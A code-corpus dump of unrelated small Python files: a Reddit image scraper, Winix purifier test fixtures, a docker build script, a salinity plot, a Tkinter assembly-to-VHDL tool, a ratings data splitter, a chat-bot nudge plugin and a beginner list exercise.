4
2172574
import pandas as pd import numpy as np import praw import cv2 import requests from tkinter import * from tkinter.ttk import * from PIL import Image as PILIMAGE import os from pathlib import Path class Reddit: def __init__(self, client_ID, client_secret): self.reddit = praw.Reddit( client_id=client_ID, client_secret=client_secret, user_agent='cor', username=None, password=<PASSWORD> ) self.index = 0 def getSubreddit(self, csvFile): self.subreddits = [] f_final = open(csvFile, "r") for line in f_final: sub = line.strip() self.subreddits.append(sub) def run(self, N, path): print(path) self.downloadImage(N, path) def downloadImage(self, N, path): ignoreImages = [cv2.imread("resources/ignoreImages/imageNF.png"), cv2.imread("resources/ignoreImages/DeletedIMG.png")] for subreddit in self.subreddits: if not os.path.exists(f"{path}/{subreddit}"): os.makedirs(f"{path}/{subreddit}") subreddit = self.reddit.subreddit(subreddit) i = 0 for submission in subreddit.new(limit=int(N)): # # # self.progress['value'] += self.progress['value'] try: if "jpg" in submission.url.lower() or "png" in submission.url.lower(): resp = requests.get(submission.url.lower(), stream=True).raw image = np.asarray(bytearray(resp.read()), dtype='uint8') image = cv2.imdecode(image, cv2.IMREAD_COLOR) # Compare with ignore Image ignoreERROR = False compare_image = cv2.resize(image, (224, 224)) for ignore in ignoreImages: diff = cv2.subtract(ignore, compare_image) b_ch, g_ch ,r_ch = cv2.split(diff) tdiff = cv2.countNonZero(b_ch) + cv2.countNonZero(g_ch) + cv2.countNonZero(r_ch) # Image has to be ignore if tdiff == 0: ignoreERROR = True if not ignoreERROR: image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) img = PILIMAGE.fromarray(image) img.save(f"{path}/{subreddit}/{i}.png") print(f"saved --> {path}/{subreddit}/{i}.png") i += 1 except: pass
3,120
tests/conftest.py
sandervalstar/winix
32
2171320
"""Tests for Winixdevice component.""" from unittest.mock import AsyncMock, MagicMock, Mock import pytest from custom_components.winix.device_wrapper import WinixDeviceWrapper from custom_components.winix.driver import WinixDriver @pytest.fixture def mock_device_wrapper() -> WinixDeviceWrapper: """Return a mocked WinixDeviceWrapper instance.""" device_wrapper = MagicMock() device_wrapper.info.mac = "f190d35456d0" device_wrapper.info.alias = "Purifier1" device_wrapper.async_plasmawave_off = AsyncMock() device_wrapper.async_plasmawave_on = AsyncMock() device_wrapper.async_set_preset_mode = AsyncMock() device_wrapper.async_set_speed = AsyncMock() device_wrapper.async_turn_on = AsyncMock() yield device_wrapper @pytest.fixture def mock_driver() -> WinixDriver: """Return a mocked WinixDriver instance.""" client = Mock() device_id = "device_1" yield WinixDriver(device_id, client) @pytest.fixture def mock_driver_with_payload(request) -> WinixDriver: """Return a mocked WinixDriver instance.""" json_value = {"body": {"data": [{"attributes": request.param}]}} response = Mock() response.json = AsyncMock(return_value=json_value) client = Mock() # aiohttp.ClientSession client.get = AsyncMock(return_value=response) device_id = "device_1" yield WinixDriver(device_id, client)
1,385
dev/scripts/docker_build.py
scailfin/flowserv-core
1
2171970
from flowserv.controller.worker.docker import docker_build image, logs = docker_build(name='test_build', requirements=['histore']) print('\n'.join(logs)) print() print(image)
177
GEOS_Util/coupled_diagnostics/verification/levitus/s_profile.py
GEOS-ESM/GMAO_Shared
1
2170120
#!/bin/env python import os import scipy as sp import matplotlib.pyplot as pl from matplotlib import ticker # Read variable execfile('ctl.py') iind=300 s=ctl.fromfile('salt',iind=iind).ave(0) s.name='S at 60W' ###################### Do plots ####################################################### clevs=sp.arange(33.,36.1,0.2) pl.figure(1) pl.clf() s.copts={'func': pl.contourf,\ 'levels' : clevs,\ } s.plot2d(); s.copts.clear() s.copts={'levels' : clevs[0::2],\ 'colors' : 'black',\ 'func': pl.contour } s.plot2d() ax=pl.gca(); ax.set_ylim(0.,3000.); ax.invert_yaxis(); ax.set_ylabel('depth, m') ax.xaxis.set_major_locator(ticker.MultipleLocator(30)) pl.grid(); pl.show() pl.savefig('pics/s_profile/s_60W.png')
765
src/main.py
CosminNechifor/Assembly-to-VHDL-memory
1
2172182
from tkinter import * from src.tools import parser from src.bll import logic global text global riscInstructions PATH_TO_JSON = './tools/instructions.json' PATH_TO_MEMORY_S = './bll/memoryStart.txt' PATH_TO_MEMORY_E = './bll/memoryEnd.txt' def writeMemory(): # assemblyCode = text.get("1.0",END).split('\n') # assemblyCode.pop() assemblyCode = ['XOR r1, r2, r3', 'ADDI r3, r2, 100', 'JMP r4'] size = len(assemblyCode) binary = logic.convertAssemblyToBinary(assemblyCode, riscInstructions) print(binary) logic.binaryToVHDLMemory(binary, pathS=PATH_TO_MEMORY_S, pathE=PATH_TO_MEMORY_E) def createWindow(): global text global riscInstructions quit = Button(text="QUIT", fg="red", command=root.destroy) quit.pack(side="bottom") assemble = Button(text="Create memory", fg="blue", command=writeMemory) assemble.pack(side="bottom") scroolBar = Scrollbar(root) text = Text(root, height=50, width=50) scroolBar.pack(side=RIGHT, fill=Y) text.pack(side=LEFT, fill=Y) scroolBar.config(command=text.yview) text.config(yscrollcommand=scroolBar.set) riscInstructions = parser.getInstructions(PATH_TO_JSON) if __name__ == '__main__': root = Tk() createWindow() root.mainloop()
1,267
runners/__init__.py
maximilianschaller/genforce
0
2169221
# python3.7 """Collects all runners.""" from .stylegan_runner_fourier_regularized import FourierRegularizedStyleGANRunner __all__ = ['FourierRegularizedStyleGANRunner']
171
Spliter.py
MHDBST/Movie_Recommender_System
0
2172515
import random import math file='ratings.csv' train_list=[] test_list=[] temp_list=[] preID=-1 with open(file) as votes: for i,vote in enumerate(votes): if i==0: continue tokens=vote.split(',') userID=int(tokens[0]) movieID=int(tokens[1]) rate=float(tokens[2]) if(userID==preID): temp_list.append(vote) else: preID=userID size=int(math.floor(len(temp_list)/10)) test=random.sample(range(0, len(temp_list)), size) for i,item in enumerate(temp_list): if i in test: test_list.append(item) else: train_list.append(item) #print len(train_list),len(test_list) temp_list=[] temp_list.append(vote) output=open('train.csv','w') for item in train_list: output.write(item) output=open('test.csv','w') for item in test_list: output.write(item)
1,012
extendPlugins/chuo.py
f88af65a/XyzB0ts
4
2172408
from botsdk.util.BotPlugin import BotPlugin class plugin(BotPlugin): def onLoad(self): self.name = "chuo" self.addType("NudgeEvent", self.nudge) self.addBotType("Mirai") self.canDetach = True async def nudge(self, request): if str(request["target"]) == request.getBot().getQq(): await request.getBot().sendNudge(target=request["fromId"], subject=request["subject"]["id"], kind=request["subject"]["kind"]) def handle(): return plugin()
594
examples/ignore-timeout.py
commtech/pyfscc
2
2171829
import fscc if __name__ == '__main__': p = fscc.Port(0) status = p.ignore_timeout p.ignore_timeout = True p.ignore_timeout = False
150
pythontutor-ru/07_lists/08_num_distinct.py
ornichola/learning-new
2
2172271
""" http://pythontutor.ru/lessons/lists/problems/num_distinct/ Дан список, упорядоченный по неубыванию элементов в нем. Определите, сколько в нем различных элементов. """ lst = [int(i) for i in input().split()] counter = 1 for i in range(len(lst) - 1): if lst[i] != lst[i + 1]: counter += 1 print(counter)
320